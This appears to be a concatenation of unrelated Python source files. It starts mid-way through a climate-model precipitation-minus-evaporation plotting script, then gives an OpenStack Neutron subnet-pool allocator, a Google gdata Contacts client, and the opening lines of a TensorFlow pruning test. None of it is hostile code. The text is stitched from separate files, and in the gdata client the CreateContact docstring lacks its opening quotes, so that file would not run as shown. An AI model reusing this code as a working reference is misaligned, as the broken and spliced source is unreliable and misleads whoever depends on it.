print("Total number of models:", len(ensemble_cube_list))
return ensemble_cube_list, history
def ensemble_stats(cube_list):
"""Get the ensemble mean and sign agreement"""
equalise_attributes(cube_list)
ensemble_cube = cube_list.merge_cube()
ensemble_mean = ensemble_cube.collapsed('ensemble_member', iris.analysis.MEAN, mdtol=0)
ensemble_mean.remove_coord('ensemble_member')
ensemble_agreement = ensemble_mean.copy()
nmodels = ensemble_cube.shape[0]
pos_data = ensemble_cube.data > 0.0
ensemble_agreement.data = pos_data.sum(axis=0) / nmodels
return ensemble_mean, ensemble_agreement
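# Worked example (added for clarity, not in the original script): with 10
# ensemble members, a grid cell where 8 members have a positive value gets an
# agreement score of 8/10 = 0.8. In plot_data() below, cells whose agreement
# falls between 0.33 and 0.66 (no clear sign agreement) are hatched.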
def plot_data(ax, ensemble_mean, ensemble_agreement, agg, title,
agreement_bounds=None, clim=None):
"""Plot ensemble data"""
assert agg in ['clim', 'anom']
inproj = ccrs.PlateCarree()
plt.sca(ax)
plt.gca().set_global()
if agg == 'clim':
cmap = 'BrBG'
levels = np.arange(-7, 8, 1)
cbar_label = 'Annual mean P-E (mm/day)'
else:
cmap = 'RdBu'
levels = np.arange(-9000, 9100, 1500)
cbar_label = 'Time-integrated P-E anomaly, 1861-2005 (kg m-2)'
x = ensemble_mean.coord('longitude').points
y = ensemble_mean.coord('latitude').points
cf = ax.contourf(x, y, ensemble_mean.data,
transform=inproj,
cmap=cmap,
levels=levels,
extend='both')
if agreement_bounds:
hatch_data = ensemble_agreement.data
ax.contourf(x, y, hatch_data,
transform=inproj,
colors='none',
levels=agreement_bounds,
hatches=['\\\\'],) # # '.', '/', '\\', '\\\\', '*'
if clim:
ce = ax.contour(x, y, clim.data,
transform=inproj,
colors=['goldenrod', 'black', 'green'],
levels=np.array([-2, 0, 2]))
cbar = plt.colorbar(cf)
cbar.set_label(cbar_label) #, fontsize=label_size)
# cbar.ax.tick_params(labelsize=number_size)
plt.gca().coastlines()
ax.set_title(title)
if agg == 'clim':
lons = np.arange(-180, 180, 0.5)
lats_sh = np.repeat(-20, len(lons))
lats_nh = np.repeat(20, len(lons))
plt.plot(lons, lats_sh, color='0.5') # linestyle, linewidth
plt.plot(lons, lats_nh, color='0.5')
def main(args):
"""Run the program."""
clim_cube_list, clim_history = get_cube_list(args.clim_files, 'clim', quick=args.quick)
clim_ensemble_mean, clim_ensemble_agreement = ensemble_stats(clim_cube_list)
clim_ensemble_mean.data = clim_ensemble_mean.data * 86400
ghg_cube_list, ghg_history = get_cube_list(args.ghg_files, 'anom', time_bounds=args.time_bounds)
ghg_ensemble_mean, ghg_ensemble_agreement = ensemble_stats(ghg_cube_list)
aa_cube_list, aa_history = get_cube_list(args.aa_files, 'anom', time_bounds=args.time_bounds)
aa_ensemble_mean, aa_ensemble_agreement = ensemble_stats(aa_cube_list)
hist_cube_list, hist_history = get_cube_list(args.hist_files, 'anom', time_bounds=args.time_bounds)
hist_ensemble_mean, hist_ensemble_agreement = ensemble_stats(hist_cube_list)
width = 25
height = 10
fig = plt.figure(figsize=[width, height])
outproj = ccrs.PlateCarree(central_longitude=180.0)
nrows = 2
ncols = 2
ax1 = plt.subplot(nrows, ncols, 1, projection=outproj)
plot_data(ax1,
clim_ensemble_mean,
clim_ensemble_agreement,
'clim',
'(a) piControl',
agreement_bounds=[0.33, 0.66])
ax2 = plt.subplot(nrows, ncols, 2, projection=outproj)
plot_data(ax2,
ghg_ensemble_mean,
ghg_ensemble_agreement,
'anom',
'(b) GHG-only',
agreement_bounds=[0.33, 0.66],
clim=clim_ensemble_mean)
ax3 = plt.subplot(nrows, ncols, 3, projection=outproj)
plot_data(ax3,
aa_ensemble_mean,
aa_ensemble_agreement,
'anom',
'(c) AA-only',
agreement_bounds=[0.33, 0.66],
clim=clim_ensemble_mean)
ax4 = plt.subplot(nrows, ncols, 4, projection=outproj)
plot_data(ax4,
hist_ensemble_mean,
hist_ensemble_agreement,
'anom',
'(d) historical',
agreement_bounds=[0.33, 0.66],
clim=clim_ensemble_mean)
fig.tight_layout()
fig.subplots_adjust(wspace=-0.15, hspace=0.2)
plt.savefig(args.outfile, bbox_inches='tight', dpi=300)
metadata_dict = {args.ghg_files[-1]: ghg_history[-1],
args.clim_files[-1]: clim_history[-1]}
log_text = cmdprov.new_log(infile_history=metadata_dict, git_repo=repo_dir)
log_file = re.sub('.png', '.met', args.outfile)
cmdprov.write_log(log_file, log_text)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__,
argument_default=argparse.SUPPRESS,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("outfile", type=str, help="output file")
parser.add_argument("--clim_files", type=str, nargs='*', help="climatology files")
parser.add_argument("--ghg_files", type=str, nargs='*', help="time-integrated anomaly files for GHG-only experiment")
parser.add_argument("--aa_files", type=str, nargs='*', help="time-integrated anomaly files for AA-only experiment")
parser.add_argument("--hist_files", type=str, nargs='*', help="time-integrated anomaly files for historical experiment")
parser.add_argument("--time_bounds", type=str, nargs=2, metavar=('START_DATE', 'END_DATE'),
default=['1861-01-01', '2005-12-31'],
help="Time period")
parser.add_argument("--quick", action="store_true", default=False,
help="Use only first 10 years of clim files")
args = parser.parse_args()
main(args)
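# Example invocation (illustrative; the script file name is hypothetical):
#
#   python plot_pe_spatial.py pe_maps.png \
#       --clim_files picontrol_*.nc \
#       --ghg_files ghg_only_*.nc \
#       --aa_files aa_only_*.nc \
#       --hist_files historical_*.nc \
#       --time_bounds 1861-01-01 2005-12-31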
|
|
# Copyright (c) 2015 Hewlett-Packard Co.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import math
import operator
import netaddr
from neutron_lib import constants
from neutron_lib import exceptions as lib_exc
from oslo_db import exception as db_exc
from oslo_utils import uuidutils
from neutron._i18n import _
from neutron.common import exceptions as n_exc
from neutron.db import api as db_api
from neutron.db import models_v2
from neutron.ipam import driver
from neutron.ipam import exceptions as ipam_exc
from neutron.ipam import requests as ipam_req
from neutron.ipam import utils as ipam_utils
class SubnetAllocator(driver.Pool):
"""Class for handling allocation of subnet prefixes from a subnet pool.
This class leverages the pluggable IPAM interface where possible to
make merging into IPAM framework easier in future cycles.
"""
def __init__(self, subnetpool, context):
super(SubnetAllocator, self).__init__(subnetpool, context)
self._sp_helper = SubnetPoolHelper()
def _lock_subnetpool(self):
"""Lock subnetpool associated row.
        This method prevents two subnets in the same subnetpool from being
        allocated concurrently; this is required to ensure non-overlapping
        cidrs in the same subnetpool.
"""
with db_api.context_manager.reader.using(self._context):
current_hash = (
self._context.session.query(models_v2.SubnetPool.hash)
.filter_by(id=self._subnetpool['id']).scalar())
if current_hash is None:
# NOTE(cbrandily): subnetpool has been deleted
raise n_exc.SubnetPoolNotFound(
subnetpool_id=self._subnetpool['id'])
new_hash = uuidutils.generate_uuid()
# NOTE(cbrandily): the update disallows 2 concurrent subnet allocation
# to succeed: at most 1 transaction will succeed, others will be
# rolled back and be caught in neutron.db.v2.base
with db_api.context_manager.writer.using(self._context):
query = (
self._context.session.query(models_v2.SubnetPool).filter_by(
id=self._subnetpool['id'], hash=current_hash))
count = query.update({'hash': new_hash})
if not count:
raise db_exc.RetryRequest(lib_exc.SubnetPoolInUse(
subnet_pool_id=self._subnetpool['id']))
def _get_allocated_cidrs(self):
with db_api.context_manager.reader.using(self._context):
query = self._context.session.query(models_v2.Subnet)
subnets = query.filter_by(subnetpool_id=self._subnetpool['id'])
return (x.cidr for x in subnets)
def _get_available_prefix_list(self):
prefixes = (x.cidr for x in self._subnetpool.prefixes)
allocations = self._get_allocated_cidrs()
prefix_set = netaddr.IPSet(iterable=prefixes)
allocation_set = netaddr.IPSet(iterable=allocations)
available_set = prefix_set.difference(allocation_set)
available_set.compact()
return sorted(available_set.iter_cidrs(),
key=operator.attrgetter('prefixlen'),
reverse=True)
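    # Worked example (added for clarity): if the unallocated space compacts to
    # [10.0.0.0/24, 10.1.0.0/16], this method returns the prefixes sorted with
    # the longest prefix length first: [10.0.0.0/24, 10.1.0.0/16].
    # _allocate_any_subnet() walks this list and carves the requested subnet
    # out of the first prefix that is large enough, so smaller free blocks are
    # consumed before larger ones.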
def _num_quota_units_in_prefixlen(self, prefixlen, quota_unit):
return math.pow(2, quota_unit - prefixlen)
def _allocations_used_by_tenant(self, quota_unit):
subnetpool_id = self._subnetpool['id']
tenant_id = self._subnetpool['tenant_id']
with db_api.context_manager.reader.using(self._context):
qry = self._context.session.query(models_v2.Subnet)
allocations = qry.filter_by(subnetpool_id=subnetpool_id,
tenant_id=tenant_id)
value = 0
for allocation in allocations:
prefixlen = netaddr.IPNetwork(allocation.cidr).prefixlen
value += self._num_quota_units_in_prefixlen(prefixlen,
quota_unit)
return value
def _check_subnetpool_tenant_quota(self, tenant_id, prefixlen):
quota_unit = self._sp_helper.ip_version_subnetpool_quota_unit(
self._subnetpool['ip_version'])
quota = self._subnetpool.get('default_quota')
if quota:
used = self._allocations_used_by_tenant(quota_unit)
requested_units = self._num_quota_units_in_prefixlen(prefixlen,
quota_unit)
if used + requested_units > quota:
raise n_exc.SubnetPoolQuotaExceeded()
def _allocate_any_subnet(self, request):
with db_api.context_manager.writer.using(self._context):
self._lock_subnetpool()
self._check_subnetpool_tenant_quota(request.tenant_id,
request.prefixlen)
prefix_pool = self._get_available_prefix_list()
for prefix in prefix_pool:
if request.prefixlen >= prefix.prefixlen:
subnet = next(prefix.subnet(request.prefixlen))
gateway_ip = request.gateway_ip
if not gateway_ip:
gateway_ip = subnet.network + 1
pools = ipam_utils.generate_pools(subnet.cidr,
gateway_ip)
return IpamSubnet(request.tenant_id,
request.subnet_id,
subnet.cidr,
gateway_ip=gateway_ip,
allocation_pools=pools)
msg = _("Insufficient prefix space to allocate subnet size /%s")
raise n_exc.SubnetAllocationError(reason=msg %
str(request.prefixlen))
def _allocate_specific_subnet(self, request):
with db_api.context_manager.writer.using(self._context):
self._lock_subnetpool()
self._check_subnetpool_tenant_quota(request.tenant_id,
request.prefixlen)
cidr = request.subnet_cidr
available = self._get_available_prefix_list()
matched = netaddr.all_matching_cidrs(cidr, available)
            if len(matched) == 1 and matched[0].prefixlen <= cidr.prefixlen:
return IpamSubnet(request.tenant_id,
request.subnet_id,
cidr,
gateway_ip=request.gateway_ip,
allocation_pools=request.allocation_pools)
msg = _("Cannot allocate requested subnet from the available "
"set of prefixes")
raise n_exc.SubnetAllocationError(reason=msg)
def allocate_subnet(self, request):
max_prefixlen = int(self._subnetpool['max_prefixlen'])
min_prefixlen = int(self._subnetpool['min_prefixlen'])
if request.prefixlen > max_prefixlen:
raise n_exc.MaxPrefixSubnetAllocationError(
prefixlen=request.prefixlen,
max_prefixlen=max_prefixlen)
if request.prefixlen < min_prefixlen:
raise n_exc.MinPrefixSubnetAllocationError(
prefixlen=request.prefixlen,
min_prefixlen=min_prefixlen)
if isinstance(request, ipam_req.AnySubnetRequest):
return self._allocate_any_subnet(request)
elif isinstance(request, ipam_req.SpecificSubnetRequest):
return self._allocate_specific_subnet(request)
else:
msg = _("Unsupported request type")
raise n_exc.SubnetAllocationError(reason=msg)
def get_subnet(self, subnet_id):
raise NotImplementedError()
def update_subnet(self, request):
raise NotImplementedError()
def remove_subnet(self, subnet_id):
raise NotImplementedError()
def get_allocator(self, subnet_ids):
return IpamSubnetGroup(self, subnet_ids)
class IpamSubnet(driver.Subnet):
def __init__(self,
tenant_id,
subnet_id,
cidr,
gateway_ip=None,
allocation_pools=None):
self._req = ipam_req.SpecificSubnetRequest(
tenant_id,
subnet_id,
cidr,
gateway_ip=gateway_ip,
allocation_pools=allocation_pools)
def allocate(self, address_request):
raise NotImplementedError()
def deallocate(self, address):
raise NotImplementedError()
def get_details(self):
return self._req
class IpamSubnetGroup(driver.SubnetGroup):
def __init__(self, driver, subnet_ids):
self._driver = driver
self._subnet_ids = subnet_ids
def allocate(self, address_request):
'''Originally, the Neutron pluggable IPAM backend would ask the driver
to try to allocate an IP from each subnet in turn, one by one. This
implementation preserves that behavior so that existing drivers work
as they did before while giving them the opportunity to optimize it
        by overriding the implementation.
'''
for subnet_id in self._subnet_ids:
try:
ipam_subnet = self._driver.get_subnet(subnet_id)
return ipam_subnet.allocate(address_request), subnet_id
except ipam_exc.IpAddressGenerationFailure:
continue
raise ipam_exc.IpAddressGenerationFailureAllSubnets()
class SubnetPoolReader(object):
'''Class to assist with reading a subnetpool, loading defaults, and
inferring IP version from prefix list. Provides a common way of
reading a stored model or a create request with default table
attributes.
'''
MIN_PREFIX_TYPE = 'min'
MAX_PREFIX_TYPE = 'max'
DEFAULT_PREFIX_TYPE = 'default'
_sp_helper = None
def __init__(self, subnetpool):
self._read_prefix_info(subnetpool)
self._sp_helper = SubnetPoolHelper()
self._read_id(subnetpool)
self._read_prefix_bounds(subnetpool)
self._read_attrs(subnetpool,
['tenant_id', 'name', 'is_default', 'shared'])
self.description = subnetpool.get('description')
self._read_address_scope(subnetpool)
self.subnetpool = {'id': self.id,
'name': self.name,
'project_id': self.tenant_id,
'prefixes': self.prefixes,
'min_prefix': self.min_prefix,
'min_prefixlen': self.min_prefixlen,
'max_prefix': self.max_prefix,
'max_prefixlen': self.max_prefixlen,
'default_prefix': self.default_prefix,
'default_prefixlen': self.default_prefixlen,
'default_quota': self.default_quota,
'address_scope_id': self.address_scope_id,
'is_default': self.is_default,
'shared': self.shared,
'description': self.description}
def _read_attrs(self, subnetpool, keys):
for key in keys:
setattr(self, key, subnetpool[key])
def _ip_version_from_cidr(self, cidr):
return netaddr.IPNetwork(cidr).version
def _prefixlen_from_cidr(self, cidr):
return netaddr.IPNetwork(cidr).prefixlen
def _read_id(self, subnetpool):
id = subnetpool.get('id', constants.ATTR_NOT_SPECIFIED)
if id is constants.ATTR_NOT_SPECIFIED:
id = uuidutils.generate_uuid()
self.id = id
def _read_prefix_bounds(self, subnetpool):
ip_version = self.ip_version
default_min = self._sp_helper.default_min_prefixlen(ip_version)
default_max = self._sp_helper.default_max_prefixlen(ip_version)
self._read_prefix_bound(self.MIN_PREFIX_TYPE,
subnetpool,
default_min)
self._read_prefix_bound(self.MAX_PREFIX_TYPE,
subnetpool,
default_max)
self._read_prefix_bound(self.DEFAULT_PREFIX_TYPE,
subnetpool,
self.min_prefixlen)
self._sp_helper.validate_min_prefixlen(self.min_prefixlen,
self.max_prefixlen)
self._sp_helper.validate_max_prefixlen(self.max_prefixlen,
ip_version)
self._sp_helper.validate_default_prefixlen(self.min_prefixlen,
self.max_prefixlen,
self.default_prefixlen)
def _read_prefix_bound(self, type, subnetpool, default_bound=None):
prefixlen_attr = type + '_prefixlen'
prefix_attr = type + '_prefix'
prefixlen = subnetpool.get(prefixlen_attr,
constants.ATTR_NOT_SPECIFIED)
wildcard = self._sp_helper.wildcard(self.ip_version)
if prefixlen is constants.ATTR_NOT_SPECIFIED and default_bound:
prefixlen = default_bound
if prefixlen is not constants.ATTR_NOT_SPECIFIED:
prefix_cidr = '/'.join((wildcard,
str(prefixlen)))
setattr(self, prefix_attr, prefix_cidr)
setattr(self, prefixlen_attr, prefixlen)
def _read_prefix_info(self, subnetpool):
prefix_list = subnetpool['prefixes']
if not prefix_list:
raise n_exc.EmptySubnetPoolPrefixList()
ip_version = None
for prefix in prefix_list:
if not ip_version:
ip_version = netaddr.IPNetwork(prefix).version
elif netaddr.IPNetwork(prefix).version != ip_version:
raise n_exc.PrefixVersionMismatch()
self.default_quota = subnetpool.get('default_quota')
if self.default_quota is constants.ATTR_NOT_SPECIFIED:
self.default_quota = None
self.ip_version = ip_version
self.prefixes = self._compact_subnetpool_prefix_list(prefix_list)
def _read_address_scope(self, subnetpool):
address_scope_id = subnetpool.get('address_scope_id',
constants.ATTR_NOT_SPECIFIED)
if address_scope_id is constants.ATTR_NOT_SPECIFIED:
address_scope_id = None
self.address_scope_id = address_scope_id
def _compact_subnetpool_prefix_list(self, prefix_list):
"""Compact any overlapping prefixes in prefix_list and return the
result
"""
ip_set = netaddr.IPSet()
for prefix in prefix_list:
ip_set.add(netaddr.IPNetwork(prefix))
ip_set.compact()
return [x.cidr for x in ip_set.iter_cidrs()]
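    # Worked example (added for clarity): a prefix list of
    # ['10.0.0.0/25', '10.0.0.128/25'] compacts to ['10.0.0.0/24'], and an
    # overlapping list such as ['10.0.0.0/24', '10.0.0.64/26'] collapses to
    # ['10.0.0.0/24'].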
class SubnetPoolHelper(object):
_PREFIX_VERSION_INFO = {4: {'max_prefixlen': constants.IPv4_BITS,
'wildcard': '0.0.0.0',
'default_min_prefixlen': 8,
# IPv4 quota measured in units of /32
'quota_units': 32},
6: {'max_prefixlen': constants.IPv6_BITS,
'wildcard': '::',
'default_min_prefixlen': 64,
# IPv6 quota measured in units of /64
'quota_units': 64}}
def validate_min_prefixlen(self, min_prefixlen, max_prefixlen):
if min_prefixlen < 0:
raise n_exc.UnsupportedMinSubnetPoolPrefix(prefix=min_prefixlen,
version=4)
if min_prefixlen > max_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='min_prefixlen',
prefixlen=min_prefixlen,
base_prefix_type='max_prefixlen',
base_prefixlen=max_prefixlen)
def validate_max_prefixlen(self, prefixlen, ip_version):
max = self._PREFIX_VERSION_INFO[ip_version]['max_prefixlen']
if prefixlen > max:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='max_prefixlen',
prefixlen=prefixlen,
base_prefix_type='ip_version_max',
base_prefixlen=max)
def validate_default_prefixlen(self,
min_prefixlen,
max_prefixlen,
default_prefixlen):
if default_prefixlen < min_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='default_prefixlen',
prefixlen=default_prefixlen,
base_prefix_type='min_prefixlen',
base_prefixlen=min_prefixlen)
if default_prefixlen > max_prefixlen:
raise n_exc.IllegalSubnetPoolPrefixBounds(
prefix_type='default_prefixlen',
prefixlen=default_prefixlen,
base_prefix_type='max_prefixlen',
base_prefixlen=max_prefixlen)
def wildcard(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['wildcard']
def default_max_prefixlen(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['max_prefixlen']
def default_min_prefixlen(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['default_min_prefixlen']
def ip_version_subnetpool_quota_unit(self, ip_version):
return self._PREFIX_VERSION_INFO[ip_version]['quota_units']
|
|
#!/usr/bin/python
#
# Copyright (C) 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ContactsService extends the GDataService to streamline Google Contacts operations.
ContactsService: Provides methods to query feeds and manipulate items. Extends
GDataService.
DictionaryToParamList: Function which converts a dictionary into a list of
URL arguments (represented as strings). This is a
utility function used in CRUD operations.
"""
__author__ = 'dbrattli (Dag Brattli)'
import gdata
import atom.service
import gdata.service
import gdata.calendar
import gdata.contacts
import atom
DEFAULT_BATCH_URL = ('http://www.google.com/m8/feeds/contacts/default/full'
'/batch')
class Error(Exception):
pass
class RequestError(Error):
pass
class ContactsService(gdata.service.GDataService):
"""Client for the Google Contacts service."""
def __init__(self, email=None, password=None, source=None,
server='www.google.com', additional_headers=None,
contact_list='default', **kwargs):
"""Creates a client for the Contacts service.
Args:
email: string (optional) The user's email address, used for
authentication.
password: string (optional) The user's password.
source: string (optional) The name of the user's application.
server: string (optional) The name of the server to which a connection
will be opened. Default value: 'www.google.com'.
contact_list: string (optional) The name of the default contact list to
use when no URI is specified to the methods of the service.
Default value: 'default' (the logged in user's contact list).
**kwargs: The other parameters to pass to gdata.service.GDataService
constructor.
"""
self.contact_list = contact_list
gdata.service.GDataService.__init__(
self, email=email, password=password, service='cp', source=source,
server=server, additional_headers=additional_headers, **kwargs)
def GetFeedUri(self, kind='contacts', contact_list=None, projection='full',
scheme=None):
"""Builds a feed URI.
Args:
kind: The type of feed to return, typically 'groups' or 'contacts'.
Default value: 'contacts'.
contact_list: The contact list to return a feed for.
Default value: self.contact_list.
projection: The projection to apply to the feed contents, for example
'full', 'base', 'base/12345', 'full/batch'. Default value: 'full'.
scheme: The URL scheme such as 'http' or 'https', None to return a
relative URI without hostname.
Returns:
A feed URI using the given kind, contact list, and projection.
Example: '/m8/feeds/contacts/default/full'.
"""
contact_list = contact_list or self.contact_list
prefix = scheme and '%s://%s' % (scheme, self.server) or ''
return '%s/m8/feeds/%s/%s/%s' % (prefix, kind, contact_list, projection)
def GetContactsFeed(self, uri=None):
uri = uri or self.GetFeedUri()
return self.Get(uri, converter=gdata.contacts.ContactsFeedFromString)
def GetContact(self, uri):
return self.Get(uri, converter=gdata.contacts.ContactEntryFromString)
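  # Usage sketch (illustrative, not part of the original module): listing the
  # logged-in user's contacts.
  #
  #   client = ContactsService(email='user@example.com', password='...',
  #                            source='example-app')
  #   client.ProgrammaticLogin()
  #   feed = client.GetContactsFeed()
  #   for entry in feed.entry:
  #     print entry.title.text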
def CreateContact(self, new_contact, insert_uri=None, url_params=None,
escape_params=True):
    Adds a new contact to Google Contacts.
Args:
new_contact: atom.Entry or subclass A new contact which is to be added to
Google Contacts.
insert_uri: the URL to post new contacts to the feed
url_params: dict (optional) Additional URL parameters to be included
in the insertion request.
escape_params: boolean (optional) If true, the url_parameters will be
escaped before they are included in the request.
Returns:
On successful insert, an entry containing the contact created
On failure, a RequestError is raised of the form:
{'status': HTTP status code from server,
'reason': HTTP reason from the server,
'body': HTTP body of the server's response}
"""
insert_uri = insert_uri or self.GetFeedUri()
return self.Post(new_contact, insert_uri, url_params=url_params,
escape_params=escape_params,
converter=gdata.contacts.ContactEntryFromString)
def UpdateContact(self, edit_uri, updated_contact, url_params=None,
escape_params=True):
"""Updates an existing contact.
Args:
edit_uri: string The edit link URI for the element being updated
updated_contact: string, atom.Entry or subclass containing
the Atom Entry which will replace the contact which is
stored at the edit_url
url_params: dict (optional) Additional URL parameters to be included
in the update request.
escape_params: boolean (optional) If true, the url_parameters will be
escaped before they are included in the request.
Returns:
On successful update, a httplib.HTTPResponse containing the server's
response to the PUT request.
On failure, a RequestError is raised of the form:
{'status': HTTP status code from server,
'reason': HTTP reason from the server,
'body': HTTP body of the server's response}
"""
return self.Put(updated_contact, self._CleanUri(edit_uri),
url_params=url_params,
escape_params=escape_params,
converter=gdata.contacts.ContactEntryFromString)
def DeleteContact(self, edit_uri, extra_headers=None,
url_params=None, escape_params=True):
"""Removes an contact with the specified ID from Google Contacts.
Args:
edit_uri: string The edit URL of the entry to be deleted. Example:
'/m8/feeds/contacts/default/full/xxx/yyy'
url_params: dict (optional) Additional URL parameters to be included
in the deletion request.
escape_params: boolean (optional) If true, the url_parameters will be
escaped before they are included in the request.
Returns:
On successful delete, a httplib.HTTPResponse containing the server's
response to the DELETE request.
On failure, a RequestError is raised of the form:
{'status': HTTP status code from server,
'reason': HTTP reason from the server,
'body': HTTP body of the server's response}
"""
return self.Delete(self._CleanUri(edit_uri),
url_params=url_params, escape_params=escape_params)
def GetGroupsFeed(self, uri=None):
uri = uri or self.GetFeedUri('groups')
return self.Get(uri, converter=gdata.contacts.GroupsFeedFromString)
def CreateGroup(self, new_group, insert_uri=None, url_params=None,
escape_params=True):
insert_uri = insert_uri or self.GetFeedUri('groups')
return self.Post(new_group, insert_uri, url_params=url_params,
escape_params=escape_params,
converter=gdata.contacts.GroupEntryFromString)
def UpdateGroup(self, edit_uri, updated_group, url_params=None,
escape_params=True):
return self.Put(updated_group, self._CleanUri(edit_uri),
url_params=url_params,
escape_params=escape_params,
converter=gdata.contacts.GroupEntryFromString)
def DeleteGroup(self, edit_uri, extra_headers=None,
url_params=None, escape_params=True):
return self.Delete(self._CleanUri(edit_uri),
url_params=url_params, escape_params=escape_params)
def ChangePhoto(self, media, contact_entry_or_url, content_type=None,
content_length=None):
"""Change the photo for the contact by uploading a new photo.
Performs a PUT against the photo edit URL to send the binary data for the
photo.
Args:
media: filename, file-like-object, or a gdata.MediaSource object to send.
contact_entry_or_url: ContactEntry or str If it is a ContactEntry, this
method will search for an edit photo link URL and
perform a PUT to the URL.
content_type: str (optional) the mime type for the photo data. This is
necessary if media is a file or file name, but if media
is a MediaSource object then the media object can contain
the mime type. If content_type is set, it will override the
mime type in the media object.
content_length: int or str (optional) Specifying the content length is
only required if media is a file-like object. If media
is a filename, the length is determined using
os.path.getsize. If media is a MediaSource object, it is
assumed that it already contains the content length.
"""
if isinstance(contact_entry_or_url, gdata.contacts.ContactEntry):
url = contact_entry_or_url.GetPhotoEditLink().href
else:
url = contact_entry_or_url
if isinstance(media, gdata.MediaSource):
payload = media
# If the media object is a file-like object, then use it as the file
# handle in the MediaSource.
elif hasattr(media, 'read'):
payload = gdata.MediaSource(file_handle=media,
content_type=content_type, content_length=content_length)
# Assume that the media object is a file name.
else:
payload = gdata.MediaSource(content_type=content_type,
content_length=content_length, file_path=media)
return self.Put(payload, url)
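# Illustrative usage of ChangePhoto (commentary added; not part of the original
# module). A minimal hedged sketch; the file name and contact entry below are
# placeholders:
#   client.ChangePhoto('photo.jpg', contact_entry, content_type='image/jpeg')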
def GetPhoto(self, contact_entry_or_url):
"""Retrives the binary data for the contact's profile photo as a string.
Args:
contact_entry_or_url: a gdata.contacts.ContactEntry object or a string
containing the photo link's URL. If the contact entry does not
contain a photo link, the image will not be fetched and this method
will return None.
"""
# TODO: add the ability to write out the binary image data to a file,
# reading and writing a chunk at a time to avoid potentially using up
# large amounts of memory.
url = None
if isinstance(contact_entry_or_url, gdata.contacts.ContactEntry):
photo_link = contact_entry_or_url.GetPhotoLink()
if photo_link:
url = photo_link.href
else:
url = contact_entry_or_url
if url:
return self.Get(url, converter=str)
else:
return None
def DeletePhoto(self, contact_entry_or_url):
url = None
if isinstance(contact_entry_or_url, gdata.contacts.ContactEntry):
url = contact_entry_or_url.GetPhotoEditLink().href
else:
url = contact_entry_or_url
if url:
self.Delete(url)
def ExecuteBatch(self, batch_feed, url,
converter=gdata.contacts.ContactsFeedFromString):
"""Sends a batch request feed to the server.
Args:
batch_feed: gdata.contacts.ContactFeed A feed containing batch
request entries. Each entry contains the operation to be performed
on the data contained in the entry. For example an entry with an
operation type of insert will be used as if the individual entry
had been inserted.
url: str The batch URL to which these operations should be applied.
converter: Function (optional) The function used to convert the server's
response to an object. The default value is ContactsFeedFromString.
Returns:
The results of the batch request's execution on the server. If the
default converter is used, this is stored in a ContactsFeed.
"""
return self.Post(batch_feed, url, converter=converter)
def _CleanUri(self, uri):
"""Sanitizes a feed URI.
Args:
uri: The URI to sanitize, can be relative or absolute.
Returns:
The given URI without its http://server prefix, if any.
Keeps the leading slash of the URI.
"""
url_prefix = 'http://%s' % self.server
if uri.startswith(url_prefix):
uri = uri[len(url_prefix):]
return uri
class ContactsQuery(gdata.service.Query):
def __init__(self, feed=None, text_query=None, params=None,
categories=None, group=None):
self.feed = feed or '/m8/feeds/contacts/default/full'
if group:
self._SetGroup(group)
gdata.service.Query.__init__(self, feed=self.feed, text_query=text_query,
params=params, categories=categories)
def _GetGroup(self):
if 'group' in self:
return self['group']
else:
return None
def _SetGroup(self, group_id):
self['group'] = group_id
group = property(_GetGroup, _SetGroup,
doc='The group query parameter to find only contacts in this group')
class GroupsQuery(gdata.service.Query):
def __init__(self, feed=None, text_query=None, params=None,
categories=None):
self.feed = feed or '/m8/feeds/groups/default/full'
gdata.service.Query.__init__(self, feed=self.feed, text_query=text_query,
params=params, categories=categories)
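# Illustrative usage of ContactsService (commentary added; not part of the
# original module). A minimal hedged sketch assuming valid ClientLogin
# credentials; the email, password and application name are placeholders:
#   client = ContactsService(email='user@example.com', password='secret',
#                            source='example-app')
#   client.ProgrammaticLogin()
#   feed = client.GetContactsFeed()
#   for entry in feed.entry:
#       print(entry.title.text)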
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for strip_pruning_vars."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from tensorflow.contrib.model_pruning.python import pruning
from tensorflow.contrib.model_pruning.python import strip_pruning_vars_lib
from tensorflow.contrib.model_pruning.python.layers import layers
from tensorflow.contrib.model_pruning.python.layers import rnn_cells
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell as tf_rnn_cells
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import training_util
def _get_number_pruning_vars(graph_def):
number_vars = 0
for node in graph_def.node:
if re.match(r"^.*(mask$)|(threshold$)", node.name):
number_vars += 1
return number_vars
